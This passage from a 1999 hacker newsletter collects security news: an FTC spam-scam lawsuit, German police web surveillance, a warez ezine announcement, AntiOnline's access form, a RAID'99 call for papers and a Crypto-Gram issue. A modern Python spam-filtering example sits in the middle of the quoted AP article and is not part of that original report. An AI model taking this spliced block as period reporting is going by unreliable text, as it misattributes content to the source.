From HNN http://www.hackernews.com/

FTC Sues Unknown Spammer "Anyway"

contributed by webmaster

The Federal Trade Commission has announced that it has filed a suit in the U.S. District Court in Charlotte against an unknown defendant. The individual, who is unknown at this time, is accused of sending spam as part of a telemarketing scam. The FTC predicts that they will have enough information to name a suspect within a few days. A choice quote from the article, "Anonymity doesn't necessarily stand in the way of some kind of law enforcement," said Eileen Harrington, the FTC's associate director of marketing practices. "We sued them anyway." Pretty soon we'll have them suing "unknown hackers" for million dollar damages. Oh, wait that already is happening isn't it?

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/spamscam990518.html

Spam Scam Creator Sued
Junk E-Mail Prompts Consumer Calls Overseas

By Kalpana Srinivasan
The Associated Press

W A S H I N G T O N, May 18 — Clifton Taylor’s 12-year-old grandson was doing his homework on the Internet when he received an e-mail message saying his order for a purchase had been processed and $375 would be billed to his credit card in the next two days.
To cancel the order that he had never placed, the 7th-grader was supposed to call the number on the screen immediately. But instead of a consumer representative, on the other end was a pornographic recording from a site in the West Indies. The international toll call popped up on the family’s phone bill shortly after.

“This approach was so different it caught us by surprise,” said Taylor, a retired school teacher living outside of Charlotte, N.C.

The scheme — a combination of spamming, or junk e-mail, and telemarketing fraud — has already prompted 20,000 consumers to complain to America Online.

Suit Filed Against Scam Mastermind

The Federal Trade Commission today was announcing a suit filed in U.S. District Court in Charlotte against the unknown defendant who masterminded the scam. The agency says this action — the first taken against an unnamed perpetrator — is a warning to con artists who try to hide behind the vast, faceless Internet.

“Anonymity doesn’t necessarily stand in the way of some kind of law enforcement,” said Eileen Harrington, the FTC’s associate director of marketing practices. “We sued them anyway.”

Harrington predicts the commission will have enough information to name a defendant in a few days. In the meantime, the court order has blocked the flow of money from American telephone carriers to the foreign telephone company that pays the operators of the hotline.

Breaking Through Forged Addresses

The case highlights some of the inherent challenges in tracking down and stopping the senders of junk e-mail, also known as spam. A common tactic among con artists sending spam, including those cited in today’s action, is to use a variety of forged e-mail addresses so they cannot be reached.

Ray Everett-Church, co-founder of the Coalition Against Unsolicited Commercial E-Mail, likens the problem to the arcade game “whack-a-mole”: no sooner does the mole get hit by the mallet in one place, than it pops up quickly in another.
“Spammers rapidly move from sending site to sending site,” said Everett-Church. That makes it futile for a server provider to block one specific e-mail address. But, he added, companies can block e-mails based on their content, for example filtering out all messages that contain a particular word or telephone number.

“The problem comes in finding similarities you can block,” he said.

FTC Creating a Spammer DB

The FTC says it is raising the ante against fraud with its own technology. More than a year ago, the commission began collecting spam forwarded to it by consumers, creating a database with hundreds of thousands of messages in it.

The commission first learned of the scheme after a consumer submitted an online complaint form — one of about 10,000 the FTC receives each week. Using the information provided by the consumer, the FTC ran a database search and came up with dozens of matches containing the same telephone number.

“This technology has given us an enormous leg up against scams that use technology,” said Harrington. The agency was able to pull together a case in a few weeks.

AOL Cooperated With FTC

AOL has a similar mechanism for receiving forwarded junk e-mail. The company has passed on its complaints about the scam in question, plus copies of the actual spam to the FTC, said Rich D’Amato, a spokesman for Dulles, Va.-based AOL.

The FTC has asked the court for the money already paid by customers to their telephone companies for the toll charges to be put aside for consumer restitution and for the company to be barred from violating the law through its deceptive messages.

A successful case against the perpetrators would come as vindication to Taylor. He contacted a litany of people from his phone company to members of Congress to local police to report the matter. Most rebuffed him because he didn’t have enough follow-up information for them to pursue a case.
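Everett-Church's point about filtering on content rather than on the sender, and the FTC's database search for complaints that share one telephone number, come down to the same operation: pull the callback number out of each message, normalize it, and index on it. The following Python is an added example (not code from the article, the FTC, CAUCE or AOL) that runs both checks over a constructed corpus; the message bodies, the rotating sender addresses under the reserved `.invalid` domain, and the 555 callback number are all made up for the demonstration.

```python
import re
from collections import defaultdict

# Constructed sample corpus (not real spam): the scam messages use forged,
# rotating sender addresses, as the article describes, while the callback
# number inside the body stays the same.  The 555 number is a placeholder.
SAMPLE_MESSAGES = [
    {"id": 1, "from": "orders@forged-one.invalid",
     "body": "Your order has been processed. $375 will be billed to your "
             "credit card. To cancel, call 1-555-010-0199 immediately."},
    {"id": 2, "from": "support@forged-two.invalid",
     "body": "Order #4471 confirmed. Questions? Call (555) 010-0199 now."},
    {"id": 3, "from": "billing@forged-three.invalid",
     "body": "Billing notice: dial 555.010.0199 within 48 hours to cancel."},
    {"id": 4, "from": "friend@example.invalid",
     "body": "Lunch tomorrow? My new number is 555-010-7777."},
    {"id": 5, "from": "orders@forged-one.invalid",
     "body": "Monthly newsletter. No action required."},
]

# North-American-style numbers: optional leading 1, optional parentheses
# around the area code, and any of space, dot or dash as separators.
PHONE_RE = re.compile(
    r"(?<!\d)(?:1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}(?!\d)")


def normalize_number(raw):
    """Strip punctuation and a leading US country code so that
    1-555-010-0199, (555) 010-0199 and 555.010.0199 compare equal."""
    digits = re.sub(r"\D", "", raw)
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]
    return digits


def extract_numbers(text):
    """All distinct, normalized phone numbers mentioned in a message body."""
    return {normalize_number(m.group(0)) for m in PHONE_RE.finditer(text)}


def group_by_number(messages):
    """Index message ids by callback number, the way the FTC database search
    in the article matched complaints that shared one telephone number."""
    index = defaultdict(list)
    for msg in messages:
        for number in extract_numbers(msg["body"]):
            index[number].append(msg["id"])
    return dict(index)


def find_campaigns(messages, min_hits=2):
    """Numbers that appear in at least min_hits separate messages."""
    return {n: ids for n, ids in group_by_number(messages).items()
            if len(ids) >= min_hits}


def sender_filter(messages, blocked_senders):
    """Blocking by From: address, which forged senders defeat."""
    return sorted(m["id"] for m in messages if m["from"] in blocked_senders)


def content_filter(messages, blocked_numbers):
    """Blocking by telephone number in the body, independent of the sender."""
    blocked = {normalize_number(n) for n in blocked_numbers}
    return sorted(m["id"] for m in messages
                  if extract_numbers(m["body"]) & blocked)


if __name__ == "__main__":
    print("campaigns:", find_campaigns(SAMPLE_MESSAGES))
    print("by sender:", sender_filter(SAMPLE_MESSAGES, {"orders@forged-one.invalid"}))
    print("by number:", content_filter(SAMPLE_MESSAGES, ["1-555-010-0199"]))
```

On this corpus the sender-based filter both misses the two forged-sender variants and blocks the harmless fifth message from a reused address, while indexing on the normalized number finds all three scam messages even though each writes the number differently. The normalization step is what makes the "similarities you can block" visible; a filter that matched the raw string would need one rule per formatting variant.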
While he was furious about the e-mail, Taylor said his “anger got worse because I couldn’t get anywhere with anybody. The whole thing just completely rubbed me the wrong way.”

@HWA

35.0 German Police Crack Down On Internet Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

May 19th

Germans Go After Inet Crime

contributed by Y0han

German officials are hoping to contain the spread of politically extreme matter or child pornography over the Internet. Deputy Interior Minister Claus Henning Schapper recently announced that German police are developing an Internet search engine that will zero in on illegal activity on the Web such as pedophile networks and neo-Nazi propaganda.

Yahoo News
http://biz.yahoo.com/rf/990517/i7.html

Monday May 17, 7:44 am Eastern Time

German police develop Internet crime-buster

BONN, May 17 (Reuters) - German police are developing an Internet search engine that will home in on illegal activity on the Web, including paedophile networks and neo-Nazi propaganda, and lead detectives to those who publish or even view such sites, an official said on Monday.

``It should make it easier for the police to pinpoint criminal content on the Internet, secure evidence and identify the senders and addressees,'' Deputy Interior Minister Claus Henning Schapper told a conference on Internet security in Bonn.

``Using it, we want to contain the spread of, for example, politically extreme matter or, highly important, child pornography over the Internet.''

He gave no further details of the device nor did he say when it might come into operation.

@HWA

36.0 After a rather long hiatus BoW resurfaces and releases issue #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Brotherhood Of Warez was/is an ezine that takes a pisstake approach to the scene and has climbed up from the mire to produce #9 of their series of ezines; numbers 1 thru 8 were released in 1992-1994...

From HNN http://www.hackernews.com/

BoW 9 Is Here!
contributed by Velkro Kode Warrior

BoW Magazine, an electronic ezine started in 1992 as a reaction to the degradation of the so-called "H/P scene" that was around at the time, has after a five year hiatus released its ninth issue. Eight issues of BoW were released from 1992-1994, and now BoW magazine is back with a much overdue ninth issue.

BoW #9
http://www.velkro.net./

The Press release;

KRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWARE

...:::||| OFFICIAL PRESS RELEASE |||:::...

[ASCII-art banner: "Brotherhood of Warez"]

K-R4D FOR THE AYCH-PEE NAT10N KICKIN IT IN 1999

-**=< BoW Ann0unc3Zz Issu3 N1n3!@#$ >=**-

PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW

Th4tz r1ght f0lkZz! BoW numb3r n1ne is in the works. The p3ople th4t brought you th3 ever-pheared .rhosts exploit and the exclusive D4l3 dr3w g3rbling photos are str1king b4ck in 1999 w1th m4d T4e-BoW sk1llz.

-**=< FuCk St4r W4rs -- R34d BoW!@%#$ >=**-

Wh3n M4y 19th r0llz 4r0und, 4nd y0u k4nt g3t 1n t0 s3e St4r W4rs, just s1t b4ck, r3l4x, s4y "Fuck 1t!@#," 4nd gr4b 4 c0py 0f BoW 9.

The Numb3r n1ne is a v3ry important number to the 1nner sanktum of BoW. NiNE is the number th4t always returns unto its3lf.
Take a look:

9 x 31337 = 282033
2 + 8 + 2 + 0 + 3 + 3 = 18
1 + 8 = 9   <-- try this with *your* favorite number

So st4y t00n3d ph0r the BoW Nine Return of the Hack K0m3b4ck Sp3kt4kul4r, and pr3p4re t0 3nter PH34R N4T10N@!#$!!#$$%!&

SiGN3D:

The BoW Imperial Senate:
U4EA / LISTER / PLUVIUS / SW_R / THE DEADKENNEDY
THE VELKRO KODE WARRIOR / D-CELLERATION TRAUMA
RATSCABIES / KIAD / THE 0WN3D R4NGER

K-Rad BoW Affiliates:
K0D3Z / ANuS / H4G1S / THE Y0RKSH1R3 P0SS3 / GLuE

MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY

(K) Kopywrong

[ASCII-art banner: "BoW 1999"]

distribute everywhere

Spreading the Zeroday Your Way since 1992
The Few, The Pr0ud, Th3 pheared. The BoW.

THE BROTHERHOOD OF WAREZ
www.velkro.net
bow@velkro.net

MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY

END 0F TR4NZM1ZZi0N...

PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW

@HWA

37.0 AntiOnline opens up its knowledge database to the pheds
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Seen via HNS http://www.net-security.org/

Knowledge Base Applications
Monday, May 17, 1999 at 23:06:28
by John Vranesevich - Founder of AntiOnline

AntiOnline is pleased to announce that it is now taking applications for access to its knowledge base. Access to this area of AntiOnline will be restricted to military and federal law enforcement personnel only. The knowledge base will provide resources and information which AntiOnline feels is too sensitive to make available to the general public as a whole.

In order to gain access to this area of AntiOnline, users are required to fill out and sign the application below, and fax it to the AntiOnline offices (724-773-0941) on official letterhead.
AntiOnline will turn over any instances of suspected falsification of records, or any individuals who are suspected of impersonating a federal authority, to the proper agencies for investigation.

Please Note: Due to high demand, it may take up to 4 weeks to activate an account.

Official Request For Access
AntiOnline’s Knowledge Base
An Interface To The "Omnipotent One" Intelligence System

Last Name: __________________________________
First Name: __________________________________
Affiliation: ___________________________________
Rank/Title: ___________________________________
City or APO or FPO: _____________________________________
State or APO/FPO: _______________________________________
Zip Code: _____________________
Commercial Phone: _______________________________________
Commercial FAX: _________________________________________
Official E-mail Address: __________________________________

In order to ensure the continued security of the Knowledge Base, AntiOnline requires you to access the system from a static IP address. Furthermore, this address must reverse-resolve back to the organization that you are officially affiliated with.

IP Address: ________________________
Address Resolves To: ________________________________

End Page One - Initial Here: _____

To allow AntiOnline staff members to contact you about your account in a secure way, we require that you register your Public PGP Key with AntiOnline’s Public Key Server. Details on how to do this are located at http://www.antionline.com/resources/pgp-key-server/

The key must be registered under the official e-mail address that you listed above. If your organization prohibits the use of PGP Encryption, make a note of it below:

PGP Comments: ______________________________________________

I understand that the information contained within “AntiOnline’s Knowledge Base” is considered sensitive.
I hereby attest that any information that I obtain from said knowledge base will not be distributed to any third party, with the exception of:

1. any individual affiliated with my organization that I am directly assigned to work with on an official basis.
2. any information which I am subpoenaed or otherwise required to turn over to a court of law as part of a civil or criminal proceeding.

I hereby attest that the above information that I provided about myself, the organization that I am affiliated with and its policies, is accurate to the best of my knowledge.

I hereby attest that the letterhead which this FAX was originally printed on is the official letterhead of the organization that I am affiliated with, and that I am using it on an official basis in accordance with the policies and procedures set forth to me by said organization.

Signed: _________________________________
Print Name: _____________________________
Initial: ________

@HWA

38.0 [ISN] RAID99 Hosted by CERIAS Call for papers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Return-Path:
Date: Sun, 16 May 1999 04:00:28 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] RFP -- Upcoming workshop hosted by CERIAS: RAID'99
Message-ID:
X-NoSpam: You do not have consent to spam me.
X-Attrition: Attrition is only good when forced. http://www.attrition.org
X-Copyright: This e-mail copyright 1999 by jericho@dimensional.com where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-isn@repsec.com
Precedence: bulk
Reply-To: cult hero
x-unsubscribe: echo "unsubscribe isn" | mail majordomo@repsec.com
x-infosecnews: x-loop, procmail, etc

Forwarded
From: spaf@cs.purdue.edu

We're hosting this important workshop in intrusion detection. The deadline for submissions is fast approaching, so we'd like to remind you all to consider making a submission.

Call For Participation - RAID'99

Second International Workshop on the Recent Advances in Intrusion Detection

Dates: September 7-9, 1999
West Lafayette, Indiana, USA

an html version of this CFP is available at http://www.zurich.ibm.com/pub/Other/RAID

Corporate Sponsors:
The SANS Institute
IBM Business Recovery Services Emergency Response Service

This workshop, the second in an ongoing annual series, will bring together leading figures from academia, government, and industry to discuss state-of-the-art intrusion detection technologies, and paradigms and issues from the research and commercial perspectives. The RAID International Workshop series is intended to further progress in intrusion detection by promoting the exchange of ideas in a broad range of topics among researchers, system developers, and users and by encouraging links between these groups.

RAID'98, held in Louvain-la-Neuve, Belgium, was the first in an anticipated annual series of international workshops that has brought together leading figures from academia, government, and industry to ponder the current state of intrusion detection technologies and paradigms from the research and commercial perspectives. More than 130 participants attended RAID'98, with nearly 50% from outside Europe, reflecting the international nature of the meeting.

RAID'99 is being hosted by the Purdue University CERIAS, in West Lafayette, Indiana, USA. The program committee invites submission of both technical and general interest papers and panels from those interested in formally presenting their ideas during the workshop.
This year, we are emphasizing the following topic areas:

Assessing IDS
  Accuracy and reliability measurements, requirements, and technologies
  Benchmarking techniques and technologies
  Relations to Risk Assessment and Risk Management Plans

IDS in High Performance and Real-Time Environments
  Large-scale/enterprise IDS
  High-Speed networks
  Managing high-volume data
  Highly distributed and heterogeneous environments

Vulnerabilities and Attacks
  New vulnerability or attack databases
  Vulnerability or attack taxonomies
  Using vulnerability databases

IDS Integration
  IDS interoperability
  Standards and Standardization - progress and assessment
  Integration with the system/network management framework
  Combining different "styles" of IDS

Innovative Approaches
  Adaptive IDS solutions
  Survivability and Dependability
  Data mining, intelligent agents
  New results related to innovative ways of thinking about IDS, new IDS methodologies and technologies
  Automated responses
  Combining IDS and system/network management

Practical Considerations
  Case studies
  IDS in heterogeneous environments
  Unique/emerging IDS operating environments, including CORBA, NT, X.509 and VPN.
  Legal issues (IDS reports as "evidence")
  Commercial intrusion detection systems and their directions
  Real-time versus Post-mortem IDS
  IDS integration with business process

Program Committee
*****************

General Chair: Gene Spafford (Purdue University, USA)
Program Chair: Deborah Frincke (University of Idaho, USA)
Program Co-Chair: Ming-Yuh Huang (Boeing Applied Research and Technology, USA)

Executive Committee
*******************

Marc Dacier (IBM Zurich Research Laboratory, Switzerland)
Kathleen Jackson (Los Alamos National Laboratory, USA)

Committee Members
*****************

Matt Bishop (University of California at Davis, USA)
Dick Brackney (National Security Agency, USA)
Yves Deswarte (LAAS-CNRS & INRIA, France)
Terry Escamilla (IBM, USA)
Rowena Chester (University of Tennessee, USA)
Tim Grance (National Institute of Standards and Technology, USA)
Sokratis Katsikas (University of the Aegean, Greece)
Baudouin Le Charlier (Universite de Namur, Belgium)
Abdelaziz Mounji (Universite de Namur, Belgium)
Jean-Jacques Quisquater (Universite Catholique de Louvain, Belgium)
Marv Schaefer (Arca Systems, USA)
Mark Schneider (National Security Agency, USA)
Steve Smaha (Free Agent, USA)
Peter Sommer (London School of Economics & Political Science, England)
Stuart Staniford-Chen (Silicon Defense, USA)
Chris Wee (University of California at Davis, USA)
Kevin Ziese (Cisco/Wheelgroup, USA)

SUBMISSIONS
===========

Papers and panels which fall into the topic areas outlined above are particularly welcome, although contributions outside those topics may also be of interest.

Each submission must contain:

1. A separate title page with: The type of submission, The title or topic, The topic category most appropriate for the subject matter; The name(s) of the speaker or panel chair and probable panelists, with their organizational affiliation(s), telephone and FAX numbers, postal address, and Internet electronic mail address.
2. A brief biography of each author or panel participant as appropriate
3. The subject category (see topic list) most appropriate for the paper or panel

Paper submissions must include an abstract that is a maximum of 600 words in length on a separate page. This abstract may be accompanied by a lengthier paper, which should be no more than ten pages (12 point font). Although encouraged, it is not necessary to submit a full paper for consideration as a speaker or for inclusion in the proceedings; however, potential speakers providing full paper submissions will be given preference in cases of equal quality. The program committee will allocate each accepted presenter up to 30 minutes for the talk, based on the complexity and interest of the proposed topic and the wishes of the speaker. The presenter will be informed of the presentation slot length when notified of acceptance.

Panel submissions must include a description that is a maximum of 300 words. The description should include both an outline of the format of the panel and a short rationale for the panel. The program committee will allocate one to two-hour time slots to each panel, based on the proposed topic, the number of panelists, and the wishes of the panel chair. The panel chair will be informed of the slot length when notified of acceptance. Panels which include time for general discussion and questions/answers for the panelists and the attendees are preferred to those which do not.

All proposals must be in English. Plan to give all panels and talks in English.

All submissions must be received on or before May 21. We strongly prefer they be submitted electronically to raid99@zurich.ibm.com or raid99@cs.uidaho.edu using one of these formats: ASCII, postscript, Word, or LaTeX. All abstracts will be made available on the web. For those submitting full papers, these submissions should be in a format which can be translated to PDF. Full papers will also be made available on the web, and possibly by CD-ROM.
If necessary, hardcopy may be sent to the nearest of the following locations (please allow sufficient time for arrival by May 21):

European Collection Site
Marc Dacier
Global Security Analysis Lab
IBM Zurich Research Laboratory
Saeumerstrasse 4
CH-8803 Rueschlikon
Switzerland

North/South American Collection Site
Ming-Yuh Huang
The Boeing Company
P.O. Box 3707 MC 7L-20
Seattle WA 98124-2207
U.S.A.

Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact raid99@cs.uidaho.edu.

A preliminary program will be available at the RAID web site, http://www.zurich.ibm.com/pub/Other/RAID/, by July 21, 1999. Last year's proceedings are available online as well.

CORPORATE SPONSORS
==================

We solicit interested organizations to become sponsors for RAID '99, particularly in sponsorship of student travel and other expenses for RAID. Please contact Deborah Frincke for information regarding corporate sponsorship of RAID.

REGISTRATION
============

Detailed registration information (including fees, suggested hotels, and travel directions) will be provided at the RAID'99 web site.

PROCEEDINGS
===========

On-line workshop proceedings will be posted on the RAID web site immediately following the workshop. It will include:

  The final program;
  A list of corporate sponsors;
  A list of attendees (subject to each attendee's approval);
  The submitted abstract and slides used by each speaker;
  The submitted description and rationale for each panel;
  The slides used by each panelist; and,
  Written position statements from each panelist.

Last year's most outstanding workshop participants were invited to submit an analogous formal paper to a special RAID edition of the refereed journal "Computer Networks and ISDN Systems." Proceedings from last year may be found online at http://www.zurich.ibm.com/pub/Other/RAID/.
IMPORTANT DATES
===============

Deadline for paper, panel submission      May 21, 1999
Notification of acceptance or rejection   July 7, 1999
Registration opens                        July 15, 1999
Preliminary program posted to web         July 15, 1999
Final full paper due (optional)           August 7, 1999
On-time Registration closes               August 21, 1999
RAID dates                                September 7-9, 1999

FOR MORE INFORMATION
====================

For further information:

On-site arrangements: contact Gene Spafford (spaf@cs.purdue.edu)
General program information or corporate sponsorship: contact Deborah Frincke (frincke@cs.uidaho.edu)
Paper and panel submission: contact Ming-Yuh Huang (huang@bcstec.ca.boeing.com)

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

39.0 Cryptogram May 15th'99
~~~~~~~~~~~~~~~~~~~~~~~~~~

CRYPTO-GRAM

May 15, 1999

by Bruce Schneier
President
Counterpane Systems
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 1999 by Bruce Schneier

** *** ***** ******* *********** *************

In this issue:
  The Internationalization of Cryptography
  News
  Federal Appeals Court Agrees that Encryption Export Rules are Unconstitutional
  The Doghouse -- Novell NetWare's Remote Passwords
  U.S. Crypto Legislation Update
  Counterpane Systems News
  Factoring with TWINKLE
  Comments from Readers

** *** ***** ******* *********** *************

The Internationalization of Cryptography

One of the stranger justifications of U.S. export controls is that they prevent the spread of cryptographic expertise. Years ago, the Administration argued that there were no cryptographic products available outside the U.S.
When several studies proved that there were hundreds of products designed, built, and marketed outside the U.S., the Administration changed its story. These products were all no good, they argued. Export controls prevent superior American products from getting into foreign hands, forcing them to use inferior non-U.S. products.

Nonsense.

Cryptography is an international science. Most of the cryptographic conferences are held outside the U.S. Most of the cryptography researchers are at universities outside the U.S., and most cryptographic papers presented at conferences are written outside the U.S. There are more advanced degree programs in cryptography outside the U.S. than there are inside. Researchers outside the U.S. tend to be better funded, and there is more interest in their work. Some of the most important cryptographic research ideas in the past ten years have come from outside the U.S. The U.S. not only does not have a lock on cryptographic research, it does not even have the majority.

In 1997, NIST solicited algorithms for the Advanced Encryption Standard, to replace DES as a government encryption standard. Of the fifteen submissions received, ten were from companies and universities outside the U.S.: Australia, Belgium, Canada, Costa Rica, England, France, Germany, Israel, Japan, Korea. Of the five submissions likely to be chosen for the next round, about half will be from outside the U.S. It is very possible that the next U.S. government encryption standard will have been designed outside the U.S.

The Internet Engineering Task Force has created a series of cryptographic standards for the Internet: secure e-mail, encrypted and authenticated IP packets, secure socket-level communications, key exchange and certificate formats, etc. These meetings are held several times a year, mostly in the U.S. but also outside. Attendees are from companies all over the world, and the standards are written by international consensus. The U.S.
has no lock on the content of the standards, nor the evaluation process. These standards are implemented in products built all over the world, not just in the U.S. For example, a Finnish company called SSH has one of the best IPSec -- a standard for IP security -- implementations in the world.

Other non-U.S. technology has been integrated into U.S. companies. A Swedish company called COST built a comprehensive cryptographic toolkit. The company was acquired by Entegrity Solutions, Inc., a U.S. startup. Algorithmic Research, and its cryptographic products, was acquired by Cylink Corp. ELVIS+, a Russian company, is now part of the U.S. company TrustWorks, Inc. RSA Data Security, now owned by Security Dynamics Inc., recently purchased the rights to a cryptographic product created in Australia. This list goes on and on. Again and again, U.S. companies have realized that cryptographic expertise is available outside the U.S., and have taken steps to secure that expertise.

Cryptography does not stop at national borders. Research, standards, and products are international. Expertise is international. For the U.S. Administration to believe that there are "national secrets" about cryptography that export controls somehow keep inside the U.S. is sheer folly. There is no evidence that this is true, and considerable evidence that the reverse is true.

** *** ***** ******* *********** *************

News

Cyberwar is becoming real, maybe. It seems that hackers in Belgrade have attacked NATO's public Web server. Now there's a big difference between attacking a Web site and attacking actual war-fighting computers, but still...
http://www.pcworld.com/cgi-bin/pcwtoday?ID=10358
See also:
http://www.zdnet.com/zdnn/stories/news/0,4586,2220773,00.html

And hackers have done damage in protest to NATO's accidental bombing of the Chinese embassy in Belgrade. A number of U.S.
government sites were hacked, including those of the Department of the Interior, the Department of Energy, and the U.S. embassy in China.
http://www.zdnet.com/zdnn/stories/news/0,4586,2256138,00.html

This item is more interesting, if it's true. According to this news report, which I can't confirm anywhere, the Serbs used a CIA mobile phone and security identification codes to call in a NATO air strike on a civilian convoy.
http://www.theherald.co.uk/news/archive/19-4-1999-0-9-58.html

More credible is the story that the Serbs are eavesdropping on NATO unencrypted radio links.
http://www.washingtonpost.com/wp-srv/WPlate/1999-05/01/169l-050199-idx.html

A cat lost an English bus company a £20,000 contract after falling asleep on a fax machine and sending confidential information to a rival firm.
http://www.telegraph.co.uk/et?ac=000647321007942&rtmo=Q9Qw9p3R&atmo=KKKKKKrM&pg=/et/99/4/19/ncat19.html

KeyNote v2, a toolkit for handling trust management issues, has been released in beta. KeyNote is a small, flexible trust management system designed by Matt Blaze, Joan Feigenbaum, and others, suitable for Internet-style applications.
KeyNote description:
ftp://ftp.research.att.com/dist/mab/knrfc.txt
Beta release of the KeyNote toolkit:
http://www.cis.upenn.edu/~angelos/keynote.html

Crypto++ 3.1, a free C++ crypto class library, has just been released. This version fixes some bugs and adds more AES candidates as well as a couple of MAC constructions based on block ciphers.
http://www.eskimo.com/~weidai/cryptlib.html

Starium will soon be selling voice encryption add-ons for telephones. They'll be using 2048-bit Diffie-Hellman for key exchange, and triple-DES for voice encryption. Price will be around $100. And unlike AT&T, these guys probably won't bend to government pressure to add key escrow to their protocols (remember Clipper).
http://www.starium.com
See also:
http://www.eetimes.com/story/OEG19990423S0015

This is a terrifying one.
A U.S.-led international organization of police and security agencies is trying to push through laws to mandate eavesdropping points for Web sites and other forms of digital communication. "The plans require the installation of a network of tapping centers throughout Europe, operating almost instantly across all national boundaries, providing access to every kind of communications including the net and satellites. A German tapping center could intercept Internet messages in Britain, or a British detective could listen to Dutch phone calls. There could even be several tapping centers listening in at once."
The full story:
http://www.heise.de/tp/english/special/enfo/6398/1.html
Another story:
http://www.newsunlimited.co.uk/The_Paper/Weekly/Story/0,3605,45981,00.html
Also see:
http://www.heise.de/tp/english/special/enfo/6397/1.html
The document is Enfopol 19, a restricted document leaked to the London-based Foundation for Information Policy Research:
http://www.fipr.org/polarch/index.html

Cool Internet Explorer security bugs: Someone else using your computer can see where you've been browsing. Someone else using your computer can access your password-protected Web sites.
http://www.zdnet.com/anchordesk/story/story_3351.html
http://www.zdnet.com/zdnn/stories/news/0,4586,1014586,00.html

Think computer privacy is a problem? Here's how it works in the real world. This was originally published in the 14 March 1999 New York Times magazine section.
http://archives.nytimes.com/archives/search/fastweb?getdoc+allyears2+db365+325093+0+wAAA+fiber-optic%7Econfessional

Visa has issued a draft of the "Visa Smart Card Protection Profile," as part of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they want comments.
http://www.visa.com/nt/chip/accept.html
http://jya.com/drpp-v.pdf
The Visa document references the Common Criteria:
http://csrc.ncsl.nist.gov/cc/

The IC2000 report on communications interception and ECHELON, the U.S.
satellite surveillance network, was approved as a working document by the Science and Technology Options Assessment Panel of the European Parliament (STOA) at their meeting in Strasbourg on 6 May 1999. The document is public, and very interesting.
Report:
http://www.iptvreports.mcmail.com/stoa_cover.htm
http://jya.com/ic2000.zip
News story:
http://www.wired.com/news/news/politics/story/19602.html

A man has been sentenced to seven and one half years for hacking $6M out of slot machines.
http://www.wired.com/news/news/technology/story/19433.html

** *** ***** ******* *********** *************

Federal Appeals Court Agrees that Encryption Export Rules are Unconstitutional

The story so far: Dan Bernstein wanted to publish the details and source code to Snuffle, an algorithm of his. Export rules prevented him from doing so. He took this to court. About a year and a half ago, Judge Patel agreed with him and ruled the export rules unconstitutional. The government requested a stay, which was granted. The case was appealed to the Federal Ninth Circuit Court of Appeals...

...which just agreed with Judge Patel's decision.

Briefly, the Court agreed that source code can be (though isn't always) "expressive," and thus qualifies as speech for the purpose of the First Amendment. Thus, the Export Administration Regulations (EAR) is a prior restraint on free speech. While such things can be legal, they bear a heavy burden; EAR does not meet that burden, because (among other things) it grants unbridled discretion to the government, it provides no firm time limits for the process, and it bars judicial review. Despite the fact that their reasoning was narrowly focused on expressive source code, they struck down the entire rule on crypto export because the rule doesn't distinguish between expressive source, functional source, and object code, and they can't (and shouldn't) do a line-by-line rewrite of the EAR.
They also said that government efforts to control cryptography, in addition to being a First Amendment issue, may also be in conflict with the Fourth Amendment, the right to speak anonymously, the right against compelled speech, and the right to informational privacy.

This does not mean that it is suddenly legal to export cryptography out of the U.S. Judge Patel issued declaratory and injunctive relief, but it was almost immediately stayed. The Ninth Circuit Court of Appeals affirmed her decision, but that Court's mandate does not issue until the time for petitioning for rehearing runs (14 days). This will almost undoubtedly be stayed, as the government asks the Supreme Court to hear the case. The conservative among us will wait before exporting source code.

Wired articles:
http://www.wired.com/news/news/politics/story/19553.html?wnpg=1
http://www.wired.com/news/news/politics/story/19571.html
http://www.wired.com/news/news/politics/story/19605.html
The decision:
http://jya.com/bernstein-9th.htm
An excellent summary and analysis:
http://www.law.miami.edu/~froomkin/bernstein99.htm

** *** ***** ******* *********** *************

The Doghouse -- Novell NetWare's Remote Passwords

Novell NetWare 5 (and 4.11 and 4.2) has a feature that allows administrators to remotely manage Novell servers. These administrative accounts are protected by passwords, and the passwords are encrypted on the servers. Unfortunately, the encryption algorithm doesn't work. According to a hacker named TheRuiner, the password file is only protected with some obfuscation, bit realignment, subtraction, value substitution, and an XOR cipher. It's pretty trivial to break, and all it really took was for someone to reverse-engineer the code and see exactly how it worked.

This isn't rocket science, guys. Password protection is a solved problem: use a strong hash function. I'm not sure why Novell wasn't paying attention.
